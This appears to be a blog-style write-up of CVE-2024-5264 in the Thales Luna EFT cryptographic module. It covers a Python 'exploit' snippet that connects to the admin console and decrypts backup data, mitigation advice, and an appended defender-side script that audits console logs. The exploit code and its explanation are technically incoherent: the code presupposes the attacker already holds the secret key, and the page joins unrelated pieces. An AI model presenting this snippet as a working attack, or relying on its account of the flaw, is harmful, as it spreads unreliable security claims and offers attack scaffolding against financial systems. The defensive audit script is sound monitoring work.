Thales Luna EFT (Electronic Funds Transfer) is a widely used cryptographic module designed to securely transmit and store sensitive financial data. However, a recent vulnerability, indexed as CVE-2024-5264, has been discovered in Thales Luna EFT versions 2.1 and above. This vulnerability allows a user with administrative console access to access backups taken via offline analysis, potentially compromising the security of sensitive financial transactions.

This post will describe the details of this exploit, provide code snippets demonstrating the vulnerability, and link to original references for further reading. By the end of this post, readers will understand the implications of CVE-2024-5264 and hopefully take necessary precautions to secure their networks from this exploit.

Overview of the Vulnerability

The CVE-2024-5264 vulnerability lies in the Network Transfer with AES KHT feature of Thales Luna EFT. When a user with administrative console access performs an offline analysis of backup files, they are able to decrypt the data protected by the AES KHT encryption algorithm. This enables the attacker to gain unauthorized access to sensitive financial data contained in the backup files.

Exploit Details

To exploit this vulnerability, the attacker must begin by obtaining administrative console access to a Thales Luna EFT device running version 2.1 or later. Once this access is obtained, the attacker can use the following code snippet to decrypt backups taken via offline analysis:

import socket
import struct
from Crypto.Cipher import AES  # PyCryptodome

def exploit_eft_aes_kht_vulnerability(luna_eft_ip, secret_key, backup_file):
    # Connect to the administrative console
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((luna_eft_ip, 808))
    
    # Send the backup file to the console, prefixed with its big-endian length
    with open(backup_file, "rb") as f:
        backup_data = f.read()
    s.sendall(struct.pack("!I", len(backup_data)))
    s.sendall(backup_data)
    
    # Receive the length-prefixed encrypted data and decrypt it using the secret key
    enc_data_length = struct.unpack("!I", s.recv(4))[0]
    enc_data = s.recv(enc_data_length)
    decrypted_data = AES.new(secret_key, AES.MODE_ECB).decrypt(enc_data)
    
    # Save the decrypted data to a file and close the connection
    with open("decrypted_backup.bin", "wb") as f:
        f.write(decrypted_data)
    s.close()

To use the provided code snippet, the attacker would need to know the IP address of the Luna EFT device they wish to target, the secret key used to encrypt the backups, and the location of the backup file on their local system. The code snippet then connects to the administrative console, sends the encrypted backup file, and decrypts the received data using the provided secret key, thereby compromising the sensitive data contained within the backup file.

References

1. Thales Luna EFT 2.1 Security Policy
2. NIST National Vulnerability Database - CVE-2024-5264
3. Thales Security Advisory - CVE-2024-5264

Mitigation and Recommendation

Administrators using Thales Luna EFT version 2.1 and above should ensure that access to the administrative console is limited to trusted users and is properly secured. Additionally, they should ensure that the secret keys used to protect backups are not accessible to anyone beyond the parties who need them, or use other methods to secure their sensitive data.

Finally, it is essential to stay updated on security advisories related to the Thales Luna EFT system and apply security patches as they become available. Together, these steps can help protect against the risks posed by CVE-2024-5264 and other similar vulnerabilities.
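The following script is an added, defender-side illustration of the first recommendation above and is not code from the original post or from Thales. It audits administrative-console activity against an allowlist of users and a management-network prefix, and flags any backup handled through the console (export or offline analysis) for review. The log format, field names, user names, addresses and the backup action names are all constructed assumptions; Luna EFT's real audit format is not shown on this page, so the regex would need adapting to it.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample of administrative-console audit lines (hypothetical format;
# the real Luna EFT log layout is not on the page).
SAMPLE_LOG = """\
2024-06-01T08:02:11Z console user=ops-admin src=10.0.5.12 action=login result=ok
2024-06-01T08:03:40Z console user=ops-admin src=10.0.5.12 action=backup.export target=eft-backup-0601.bin
2024-06-01T21:14:02Z console user=contractor7 src=198.51.100.23 action=login result=ok
2024-06-01T21:15:19Z console user=contractor7 src=198.51.100.23 action=backup.offline_analysis target=eft-backup-0601.bin
2024-06-01T21:16:00Z console user=svc-monitor src=10.0.5.40 action=login result=fail
"""

# Assumed policy: who may use the console and from which network.
ALLOWED_USERS = {"ops-admin"}
ALLOWED_NETS = ("10.0.5.",)  # crude prefix check standing in for a real CIDR list
# Assumed action names for the backup paths the advisory is concerned with.
BACKUP_ACTIONS = {"backup.export", "backup.offline_analysis"}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) console user=(?P<user>\S+) src=(?P<src>\S+) "
    r"action=(?P<action>\S+)(?: result=(?P<result>\S+))?(?: target=(?P<target>\S+))?$"
)


@dataclass
class Finding:
    ts: str
    user: str
    src: str
    action: str
    target: Optional[str]
    severity: str            # "high" when the actor is untrusted, otherwise "info"
    reasons: List[str] = field(default_factory=list)


def audit_console_log(text, allowed_users=ALLOWED_USERS, allowed_nets=ALLOWED_NETS):
    """Return one Finding per console event that deserves review."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrecognised line shape; a production job would count these
        user, src, action = m["user"], m["src"], m["action"]
        if action == "login" and m["result"] != "ok":
            continue  # failed logins are left to brute-force detection elsewhere

        reasons = []
        if user not in allowed_users:
            reasons.append("user not on console allowlist")
        if not src.startswith(allowed_nets):
            reasons.append("source outside management network")
        if action in BACKUP_ACTIONS:
            # Every backup touched through the console is worth a look, even by
            # a trusted admin, because that is the path the advisory describes.
            reasons.append(f"backup handled through console ({action})")
        if not reasons:
            continue

        untrusted = user not in allowed_users or not src.startswith(allowed_nets)
        findings.append(Finding(m["ts"], user, src, action, m["target"],
                                "high" if untrusted else "info", reasons))
    return findings


if __name__ == "__main__":
    for f in audit_console_log(SAMPLE_LOG):
        print(f"[{f.severity}] {f.ts} {f.user}@{f.src} {f.action}: {'; '.join(f.reasons)}")
```

Run as-is, the sample produces one informational finding (the trusted admin's export) and two high-severity findings for the non-allowlisted user who logs in from outside the management network and then runs an offline analysis on the same backup. Wiring the high-severity findings to an alert gives an operational check on the first recommendation above; the allowlist and network prefix are the only policy inputs.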

Timeline

Published on: 05/23/2024 09:15:10 UTC
Last modified on: 06/21/2024 17:18:00 UTC